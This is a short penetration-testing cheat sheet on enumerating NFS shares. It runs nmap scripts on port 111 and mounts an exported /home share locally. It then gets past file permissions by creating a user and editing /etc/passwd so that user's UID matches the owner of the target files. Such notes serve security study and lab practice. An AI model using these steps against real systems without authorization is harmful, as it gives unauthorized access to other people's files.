NFS Enumeration
NFS Enumeration
NFS is very insecure. Check port 111 for service **************rpcbind and **************portmapper
nmap -p 111 --script nfs* <ip> run all script
In Output, if showmount is visible check for the directory as it is vuln. For ex:- /home directory is being shared and we can access it by mounting it on our Kali virtual machine
mkdir vulnhome
sudo mount -o nolock <ip>:/home ~/vulnhome/ /home will mount in local vulnhome -o nolock to disable file locking
Check mounted directory
If vuln file is not accessable , check its UUID , create new user and change its uuid
sudo adduser <username>
sudo sed -i -e 's/<new user UUID>/<vuln UUID>/g' /etc/passwd
su <new user>
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